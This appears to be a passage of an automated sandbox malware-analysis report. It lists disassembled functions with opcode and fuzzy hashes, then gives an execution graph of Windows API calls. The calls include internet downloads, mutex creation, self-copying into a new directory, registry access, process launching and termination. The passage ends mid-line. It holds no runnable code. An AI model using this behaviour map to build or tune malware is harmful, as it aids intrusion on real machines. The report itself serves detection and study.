                                                                                                                                        Function 05DE5CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                        • String ID: U
                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction ID: 4f3798b31dd3e7bc4d813b96f75c7e57144f772f24306d5089a202fc538f1342
                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                        • Instruction Fuzzy Hash: 2321EB327182087AEB00FBA4FC49FBE73ADEB45694F504167F909D7190FA71E94087A4
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DDA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset
                                                                                                                                        • String ID: p2Q
                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction ID: acd8e60bf72c624012580e940c3d6534ea6c1c6934300c3bf4b2c87c2c3c2833
                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                        • Instruction Fuzzy Hash: D5F0ED78698755A5F7217750BC2AB957E91BB31B08F104089E1182E3E1D3FD338CA7AA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E0FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 05E0FBF1
                                                                                                                                          • Part of subcall function 05DF169C: std::exception::_Copy_str.LIBCMT ref: 05DF16B5
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 05E0FC06
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                        • String ID: TeM$TeM
                                                                                                                                        • API String ID: 3662862379-3870166017
                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction ID: a6d0de6a5be45e597dbbc81d8fec3d167a0238a2c617e1ed32851b7f881f0fea
                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                        • Instruction Fuzzy Hash: ECD06775D0020CBBCB00EFA5D459CDDBBB8EA04344F418467AA1497241EA74A749CB95
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 05DE197D: __wfsopen.LIBCMT ref: 05DE1988
                                                                                                                                        • _fgetws.LIBCMT ref: 05DCD15C
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wfsopen_fgetws
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 853134316-0
                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction ID: 84d21c0c9482db9499a40d3e9a35a3a536bf133da35af49d7f84ee5d2a0c1416
                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                        • Instruction Fuzzy Hash: 0D918271D0025AABCF21EF94CC45BAEBBB6BF04204F14057FD856A3240E775AA14CBA5
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DCD540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _malloc$__except_handler4_fprintf
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1783060780-0
                                                                                                                                        • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction ID: 1decb773c86db3a772ab2b3783eb48fdfd2a11afe8f7621817047524433256f8
                                                                                                                                        • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                                                        • Instruction Fuzzy Hash: FCA16CB1D00289EBEF11EFA4CC49BEEBF75AF14304F140069E50577291D7B65A88CBA6
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05DE2AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2974526305-0
                                                                                                                                        • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction ID: ad6b9e0a3aee1408143818bb75ac709b0b89db2b7970f258be3284bca59c00a6
                                                                                                                                        • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                                                        • Instruction Fuzzy Hash: 05519238B043099BDB29EF69CC84A6E77BABF40321F14872BE876D62D4D771D9508B50
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E01359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3016257755-0
                                                                                                                                        • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction ID: eeecd272dc7f1659d07401e6ae625f5a9d49c751a0f99f8dd4ede65e68feba9a
                                                                                                                                        • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                                                        • Instruction Fuzzy Hash: C2014C3280414EFBCF1A5E84DC05CEE3F63BB19354B49A415FA99594B0D33AC5B1EB81
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Function 05E87A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 05E87A4B
                                                                                                                                          • Part of subcall function 05E88140: ___BuildCatchObjectHelper.LIBCMT ref: 05E88172
                                                                                                                                          • Part of subcall function 05E88140: ___AdjustPointer.LIBCMT ref: 05E88189
                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 05E87A62
                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 05E87A74
                                                                                                                                        • CallCatchBlock.LIBCMT ref: 05E87A98
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1213423882.0000000005DC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DC0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_5dc0000_qJKiVKZdFk.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2901542994-0
                                                                                                                                        • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction ID: 282413c0750823a0b773d594a97c1f551ced1294ea25dc1f5ae5cf69cd149e26
                                                                                                                                        • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                                                        • Instruction Fuzzy Hash: 11010532500109BBDF12AF95CC04EEA7BAAFF48758F149054FD9C65120D732E9A1DBA0
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Execution Graph

                                                                                                                                        Execution Coverage:2%
                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                        Signature Coverage:37%
                                                                                                                                        Total number of Nodes:805
                                                                                                                                        Total number of Limit Nodes:91
                                                                                                                                        execution_graph 44673 423f84 44674 423f90 CallCatchBlock 44673->44674 44710 432603 GetStartupInfoW 44674->44710 44677 423f95 44712 4278d5 GetProcessHeap 44677->44712 44678 423fed 44679 423ff8 44678->44679 45042 42411a 58 API calls 3 library calls 44678->45042 44713 425141 44679->44713 44682 423ffe 44683 424009 __RTC_Initialize 44682->44683 45043 42411a 58 API calls 3 library calls 44682->45043 44734 428754 44683->44734 44686 424018 44687 424024 GetCommandLineW 44686->44687 45044 42411a 58 API calls 3 library calls 44686->45044 44753 43235f GetEnvironmentStringsW 44687->44753 44690 424023 44690->44687 44693 42403e 44694 424049 44693->44694 45045 427c2e 58 API calls 3 library calls 44693->45045 44763 4321a1 44694->44763 44698 42405a 44777 427c68 44698->44777 44701 424062 44702 42406d __wwincmdln 44701->44702 45047 427c2e 58 API calls 3 library calls 44701->45047 44783 419f90 44702->44783 44705 424081 44706 424090 44705->44706 45039 427f3d 44705->45039 45048 427c59 58 API calls _doexit 44706->45048 44709 424095 CallCatchBlock 44711 432619 44710->44711 44711->44677 44712->44678 45049 427d6c 36 API calls 2 library calls 44713->45049 44715 425146 45050 428c48 InitializeCriticalSectionAndSpinCount __mtinitlocks 44715->45050 44717 42514b 44718 42514f 44717->44718 45052 4324f7 TlsAlloc 44717->45052 45051 4251b7 61 API calls 2 library calls 44718->45051 44721 425154 44721->44682 44722 425161 44722->44718 44723 42516c 44722->44723 45053 428c96 44723->45053 44726 4251ae 45061 4251b7 61 API calls 2 library calls 44726->45061 44729 42518d 44729->44726 44731 425193 44729->44731 44730 4251b3 44730->44682 45060 42508e 58 API calls 4 library calls 44731->45060 44733 42519b GetCurrentThreadId 44733->44682 44735 428760 CallCatchBlock 44734->44735 45073 428af7 44735->45073 44737 428767 44738 428c96 __calloc_crt 58 API calls 44737->44738 44739 428778 44738->44739 44740 4287e3 GetStartupInfoW 44739->44740 44741 428783 CallCatchBlock @_EH4_CallFilterFunc@8 44739->44741 44747 4287f8 44740->44747 44750 428927 44740->44750 44741->44686 44742 4289ef 45082 4289ff LeaveCriticalSection _doexit 44742->45082 44744 428c96 __calloc_crt 58 API calls 44744->44747 44745 428974 GetStdHandle 44745->44750 44746 428987 GetFileType 44746->44750 44747->44744 44749 428846 44747->44749 44747->44750 44748 42887a GetFileType 44748->44749 44749->44748 44749->44750 45080 43263e InitializeCriticalSectionAndSpinCount 44749->45080 44750->44742 44750->44745 44750->44746 45081 43263e InitializeCriticalSectionAndSpinCount 44750->45081 44754 432370 44753->44754 44755 424034 44753->44755 45085 428cde 58 API calls 2 library calls 44754->45085 44759 431f64 GetModuleFileNameW 44755->44759 44757 432396 ___crtGetEnvironmentStringsW 44758 4323ac FreeEnvironmentStringsW 44757->44758 44758->44755 44760 431f98 _wparse_cmdline 44759->44760 44762 431fd8 _wparse_cmdline 44760->44762 45086 428cde 58 API calls 2 library calls 44760->45086 44762->44693 44764 4321ba __NMSG_WRITE 44763->44764 44768 42404f 44763->44768 44765 428c96 __calloc_crt 58 API calls 44764->44765 44773 4321e3 __NMSG_WRITE 44765->44773 44766 43223a 45088 420bed 58 API calls 2 library calls 44766->45088 44768->44698 45046 427c2e 58 API calls 3 library calls 44768->45046 44769 428c96 __calloc_crt 58 API calls 44769->44773 44770 43225f 45089 420bed 58 API calls 2 library calls 44770->45089 44773->44766 44773->44768 44773->44769 44773->44770 44774 432276 44773->44774 45087 42962f 58 API calls __cftof_l 44773->45087 45090 4242fd 8 API calls 2 library calls 44774->45090 44776 432282 44779 427c74 __IsNonwritableInCurrentImage 44777->44779 45091 43aeb5 44779->45091 44780 427c92 __initterm_e 44782 427cb1 _doexit __IsNonwritableInCurrentImage 44780->44782 45094 4219ac 67 API calls __cinit 44780->45094 44782->44701 44784 419fa0 __ftell_nolock 44783->44784 45095 40cf10 44784->45095 44786 419fb0 44787 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44786->44787 44788 419fb4 44786->44788 44789 419fe4 GetLastError 44787->44789 44790 419fe6 44787->44790 45319 4124e0 109 API calls _memset 44788->45319 44789->44790 45109 41d3c0 44790->45109 44793 419fb9 44793->44705 44795 41a022 45112 41d340 44795->45112 44796 41b669 45417 44f23e 59 API calls 2 library calls 44796->45417 44798 41b673 45418 44f23e 59 API calls 2 library calls 44798->45418 44803 41a065 45117 413a90 44803->45117 44807 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44808 41a33d GlobalFree 44807->44808 44823 41a196 44807->44823 44809 41a354 44808->44809 44810 41a45c 44808->44810 44812 412220 76 API calls 44809->44812 45173 412220 44810->45173 44811 41a100 44811->44807 44814 41a359 44812->44814 44816 41a466 44814->44816 45188 40ef50 44814->45188 44815 41a1cc lstrcmpW lstrcmpW 44815->44823 44816->44705 44818 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44818->44823 44819 41a48f 44822 41a4ef 44819->44822 45193 413ea0 44819->45193 44821 420235 60 API calls _TranslateName 44821->44823 44825 411cd0 92 API calls 44822->44825 44823->44808 44823->44815 44823->44818 44823->44821 44824 41a361 44823->44824 45133 423c92 44824->45133 44827 41a563 44825->44827 44860 41a5db 44827->44860 45214 414690 44827->45214 44829 41a395 OpenProcess 44831 41a402 44829->44831 44832 41a3a9 WaitForSingleObject CloseHandle 44829->44832 45136 411cd0 44831->45136 44832->44831 44837 41a3cb 44832->44837 44833 41a6f9 45321 411a10 8 API calls 44833->45321 44834 41a5a9 44839 414690 59 API calls 44834->44839 44853 41a3e2 GlobalFree 44837->44853 44854 41a3d4 Sleep 44837->44854 45320 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44837->45320 44838 41a6fe 44841 41a8b6 CreateMutexA 44838->44841 44842 41a70f 44838->44842 44844 41a5d4 44839->44844 44840 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44845 41a451 44840->44845 44847 41a8ca 44841->44847 44846 41a7dc 44842->44846 44858 40ef50 58 API calls 44842->44858 45237 40d240 CoInitialize 44844->45237 44845->44705 44849 40ef50 58 API calls 44846->44849 44852 40ef50 58 API calls 44847->44852 44848 41a624 GetVersion 44848->44833 44850 41a632 lstrcpyW lstrcatW lstrcatW 44848->44850 44855 41a7ec 44849->44855 44856 41a674 _memset 44850->44856 44863 41a8da 44852->44863 44857 41a3f7 44853->44857 44854->44829 44859 41a7f1 lstrlenA 44855->44859 44862 41a6b4 ShellExecuteExW 44856->44862 44857->44705 44865 41a72f 44858->44865 45323 420c62 44859->45323 44860->44833 44860->44838 44860->44841 44860->44848 44862->44838 44884 41a6e3 44862->44884 44866 413ea0 59 API calls 44863->44866 44879 41a92f 44863->44879 44864 41a810 _memset 44868 41a81e MultiByteToWideChar lstrcatW 44864->44868 44867 413ea0 59 API calls 44865->44867 44870 41a780 44865->44870 44866->44863 44867->44865 44868->44859 44869 41a847 lstrlenW 44868->44869 44871 41a8a0 CreateMutexA 44869->44871 44872 41a856 44869->44872 44873 41a792 44870->44873 44874 41a79c CreateThread 44870->44874 44871->44847 45340 40e760 95 API calls 44872->45340 45322 413ff0 59 API calls ___crtGetEnvironmentStringsW 44873->45322 44874->44846 44878 41a7d0 44874->44878 45722 41dbd0 95 API calls 4 library calls 44874->45722 44877 41a860 CreateThread WaitForSingleObject 44877->44871 45723 41e690 203 API calls 8 library calls 44877->45723 44878->44846 45341 415c10 44879->45341 44881 41a98c 45356 412840 60 API calls 44881->45356 44883 41a997 45357 410fc0 93 API calls 4 library calls 44883->45357 44884->44705 44886 41a9ab 44887 41a9c2 lstrlenA 44886->44887 44887->44884 44889 41a9d8 44887->44889 44888 415c10 59 API calls 44890 41aa23 44888->44890 44889->44888 45358 412840 60 API calls 44890->45358 44892 41aa2e lstrcpyA 44895 41aa4b 44892->44895 44894 415c10 59 API calls 44896 41aa90 44894->44896 44895->44894 44897 40ef50 58 API calls 44896->44897 44898 41aaa0 44897->44898 44899 413ea0 59 API calls 44898->44899 44900 41aaf5 44898->44900 44899->44898 45359 413ff0 59 API calls ___crtGetEnvironmentStringsW 44900->45359 44902 41ab1d 45360 412900 44902->45360 44904 40ef50 58 API calls 44906 41abc5 44904->44906 44905 41ab28 _memmove 44905->44904 44907 413ea0 59 API calls 44906->44907 44908 41ac1e 44906->44908 44907->44906 45365 413ff0 59 API calls ___crtGetEnvironmentStringsW 44908->45365 44910 41ac46 44911 412900 60 API calls 44910->44911 44913 41ac51 _memmove 44911->44913 44912 40ef50 58 API calls 44914 41acee 44912->44914 44913->44912 44915 413ea0 59 API calls 44914->44915 44916 41ad43 44914->44916 44915->44914 45366 413ff0 59 API calls ___crtGetEnvironmentStringsW 44916->45366 44918 41ad6b 44919 412900 60 API calls 44918->44919 44922 41ad76 _memmove 44919->44922 44920 415c10 59 API calls 44921 41ae2a 44920->44921 45367 413580 59 API calls 44921->45367 44922->44920 44924 41ae3c 44925 415c10 59 API calls 44924->44925 44926 41ae76 44925->44926 45368 413580 59 API calls 44926->45368 44928 41ae82 44929 415c10 59 API calls 44928->44929 44930 41aebc 44929->44930 45369 413580 59 API calls 44930->45369 44932 41aec8 44933 415c10 59 API calls 44932->44933 44934 41af02 44933->44934 45370 413580 59 API calls 44934->45370 44936 41af0e 44937 415c10 59 API calls 44936->44937 44938 41af48 44937->44938 45371 413580 59 API calls 44938->45371 44940 41af54 44941 415c10 59 API calls 44940->44941 44942 41af8e 44941->44942 45372 413580 59 API calls 44942->45372 44944 41af9a 44945 415c10 59 API calls 44944->44945 44946 41afd4 44945->44946 45373 413580 59 API calls 44946->45373 44948 41afe0 45374 413100 59 API calls 44948->45374 44950 41b001 45375 413580 59 API calls 44950->45375 44952 41b025 45376 413100 59 API calls 44952->45376 44954 41b03c 45377 413580 59 API calls 44954->45377 44956 41b059 45378 413100 59 API calls 44956->45378 44958 41b070 45379 413580 59 API calls 44958->45379 44960 41b07c 45380 413100 59 API calls 44960->45380 44962 41b093 45381 413580 59 API calls 44962->45381 44964 41b09f 45382 413100 59 API calls 44964->45382 44966 41b0b6 45383 413580 59 API calls 44966->45383 44968 41b0c2 45384 413100 59 API calls 44968->45384 44970 41b0d9 45385 413580 59 API calls 44970->45385 44972 41b0e5 45386 413100 59 API calls 44972->45386 44974 41b0fc 45387 413580 59 API calls 44974->45387 44976 41b108 44978 41b130 44976->44978 45388 41cdd0 59 API calls 44976->45388 44979 40ef50 58 API calls 44978->44979 44980 41b16e 44979->44980 44982 41b1a5 GetUserNameW 44980->44982 45389 412de0 59 API calls 44980->45389 44983 41b1c9 44982->44983 45390 412c40 44983->45390 44985 41b1d8 45397 412bf0 59 API calls 44985->45397 44987 41b1ea 45398 40ecb0 60 API calls 2 library calls 44987->45398 44989 41b2f5 45401 4136c0 59 API calls 44989->45401 44991 41b308 45402 40ca70 59 API calls 44991->45402 44993 41b311 45403 4130b0 59 API calls 44993->45403 44995 412c40 59 API calls 45010 41b1f3 44995->45010 44996 41b322 45404 40c740 120 API calls 4 library calls 44996->45404 44998 412900 60 API calls 44998->45010 44999 41b327 45405 4111c0 169 API calls 2 library calls 44999->45405 45002 41b33b 45406 41ba10 LoadCursorW RegisterClassExW 45002->45406 45004 41b343 45407 41ba80 CreateWindowExW ShowWindow UpdateWindow 45004->45407 45005 413100 59 API calls 45005->45010 45007 41b34b 45011 41b34f 45007->45011 45408 410a50 65 API calls 45007->45408 45010->44989 45010->44995 45010->44998 45010->45005 45399 413580 59 API calls 45010->45399 45400 40f1f0 59 API calls 45010->45400 45011->44884 45012 41b379 45409 413100 59 API calls 45012->45409 45014 41b3a5 45410 413580 59 API calls 45014->45410 45016 41b48b 45416 41fdc0 CreateThread 45016->45416 45018 41b49f GetMessageW 45019 41b4ed 45018->45019 45020 41b4bf 45018->45020 45023 41b502 PostThreadMessageW 45019->45023 45024 41b55b 45019->45024 45021 41b4c5 TranslateMessage DispatchMessageW GetMessageW 45020->45021 45021->45019 45021->45021 45025 41b510 PeekMessageW 45023->45025 45026 41b564 PostThreadMessageW 45024->45026 45027 41b5bb 45024->45027 45029 41b546 WaitForSingleObject 45025->45029 45030 41b526 DispatchMessageW PeekMessageW 45025->45030 45028 41b570 PeekMessageW 45026->45028 45027->45011 45033 41b5d2 CloseHandle 45027->45033 45031 41b5a6 WaitForSingleObject 45028->45031 45032 41b586 DispatchMessageW PeekMessageW 45028->45032 45029->45024 45029->45025 45030->45029 45030->45030 45031->45027 45031->45028 45032->45031 45032->45032 45033->45011 45038 41b3b3 45038->45016 45411 41c330 59 API calls 45038->45411 45412 41c240 59 API calls 45038->45412 45413 41b8b0 59 API calls 45038->45413 45414 413260 59 API calls 45038->45414 45415 41fa10 CreateThread 45038->45415 45724 427e0e 45039->45724 45041 427f4c 45041->44706 45042->44679 45043->44683 45044->44690 45048->44709 45049->44715 45050->44717 45051->44721 45052->44722 45054 428c9d 45053->45054 45056 425179 45054->45056 45058 428cbb 45054->45058 45062 43b813 45054->45062 45056->44726 45059 432553 TlsSetValue 45056->45059 45058->45054 45058->45056 45070 4329c9 Sleep 45058->45070 45059->44729 45060->44733 45061->44730 45063 43b81e 45062->45063 45068 43b839 45062->45068 45064 43b82a 45063->45064 45063->45068 45071 425208 58 API calls __getptd_noexit 45064->45071 45066 43b849 HeapAlloc 45066->45068 45069 43b82f 45066->45069 45068->45066 45068->45069 45072 42793d DecodePointer 45068->45072 45069->45054 45070->45058 45071->45069 45072->45068 45074 428b1b EnterCriticalSection 45073->45074 45075 428b08 45073->45075 45074->44737 45083 428b9f 58 API calls 10 library calls 45075->45083 45077 428b0e 45077->45074 45084 427c2e 58 API calls 3 library calls 45077->45084 45080->44749 45081->44750 45082->44741 45083->45077 45085->44757 45086->44762 45087->44773 45088->44768 45089->44768 45090->44776 45092 43aeb8 EncodePointer 45091->45092 45092->45092 45093 43aed2 45092->45093 45093->44780 45094->44782 45096 40cf32 _memset __ftell_nolock 45095->45096 45097 40cf4f InternetOpenW 45096->45097 45098 415c10 59 API calls 45097->45098 45099 40cf8a InternetOpenUrlW 45098->45099 45100 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 45099->45100 45106 40cfb2 45099->45106 45419 4156d0 45100->45419 45102 4156d0 59 API calls 45104 40d049 45102->45104 45103 40d000 45103->45102 45104->45106 45438 413010 59 API calls 45104->45438 45106->44786 45107 40d084 45107->45106 45439 413010 59 API calls 45107->45439 45444 41ccc0 45109->45444 45464 41cc50 45112->45464 45115 41a04d 45115->44798 45115->44803 45118 413ab2 45117->45118 45126 413ad0 GetModuleFileNameW PathRemoveFileSpecW 45117->45126 45119 413b00 45118->45119 45120 413aba 45118->45120 45472 44f23e 59 API calls 2 library calls 45119->45472 45121 423b4c 59 API calls 45120->45121 45123 413ac7 45121->45123 45123->45126 45473 44f1bb 59 API calls 3 library calls 45123->45473 45127 418400 45126->45127 45128 418437 45127->45128 45132 418446 45127->45132 45128->45132 45474 415d50 59 API calls ___crtGetEnvironmentStringsW 45128->45474 45129 4184b9 45129->44811 45132->45129 45475 418d50 59 API calls 45132->45475 45476 431781 45133->45476 45494 42f7c0 45136->45494 45139 411d20 _memset 45140 411d40 RegQueryValueExW RegCloseKey 45139->45140 45141 411d8f 45140->45141 45141->45141 45142 415c10 59 API calls 45141->45142 45143 411dbf 45142->45143 45144 411dd1 lstrlenA 45143->45144 45145 411e7c 45143->45145 45496 413520 59 API calls 45144->45496 45146 411e94 6 API calls 45145->45146 45149 411ef5 UuidCreate UuidToStringW 45146->45149 45148 411df1 45150 411e3c PathFileExistsW 45148->45150 45151 411e00 45148->45151 45152 411f36 45149->45152 45150->45145 45153 411e52 45150->45153 45151->45148 45151->45150 45152->45152 45155 415c10 59 API calls 45152->45155 45154 411e6a 45153->45154 45157 414690 59 API calls 45153->45157 45163 4121d1 45154->45163 45156 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 45155->45156 45158 411f98 45156->45158 45160 411fce 45156->45160 45157->45154 45159 415c10 59 API calls 45158->45159 45159->45160 45161 415c10 59 API calls 45160->45161 45162 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 45161->45162 45162->45163 45164 41207c _memset 45162->45164 45163->44840 45165 412095 6 API calls 45164->45165 45166 412115 _memset 45165->45166 45167 412109 45165->45167 45169 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 45166->45169 45497 413260 59 API calls 45167->45497 45170 4121b2 45169->45170 45171 4121aa GetLastError 45169->45171 45172 4121c0 WaitForSingleObject 45170->45172 45171->45163 45172->45163 45172->45172 45174 42f7c0 __ftell_nolock 45173->45174 45175 41222d 7 API calls 45174->45175 45176 4122bd K32EnumProcesses 45175->45176 45177 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 45175->45177 45178 4122d3 45176->45178 45180 4122df 45176->45180 45177->45176 45178->44814 45179 412353 45179->44814 45180->45179 45181 4122f0 OpenProcess 45180->45181 45182 412346 CloseHandle 45181->45182 45183 41230a K32EnumProcessModules 45181->45183 45182->45179 45182->45181 45183->45182 45184 41231c K32GetModuleBaseNameW 45183->45184 45498 420235 45184->45498 45186 41233e 45186->45182 45187 412345 45186->45187 45187->45182 45189 420c62 _malloc 58 API calls 45188->45189 45192 40ef6e _memset 45189->45192 45190 40efdc 45190->44819 45191 420c62 _malloc 58 API calls 45191->45192 45192->45190 45192->45191 45192->45192 45194 413f05 45193->45194 45198 413eae 45193->45198 45195 413fb1 45194->45195 45196 413f18 45194->45196 45514 44f23e 59 API calls 2 library calls 45195->45514 45199 413fbb 45196->45199 45200 413f2d 45196->45200 45201 413f3d ___crtGetEnvironmentStringsW 45196->45201 45198->45194 45205 413ed4 45198->45205 45515 44f23e 59 API calls 2 library calls 45199->45515 45200->45201 45513 416760 59 API calls 2 library calls 45200->45513 45201->44819 45207 413ed9 45205->45207 45208 413eef 45205->45208 45511 413da0 59 API calls ___crtGetEnvironmentStringsW 45207->45511 45512 413da0 59 API calls ___crtGetEnvironmentStringsW 45208->45512 45212 413ee9 45212->44819 45213 413eff 45213->44819 45215 4146a9 45214->45215 45216 41478c 45214->45216 45217 4146b6 45215->45217 45218 4146e9 45215->45218 45518 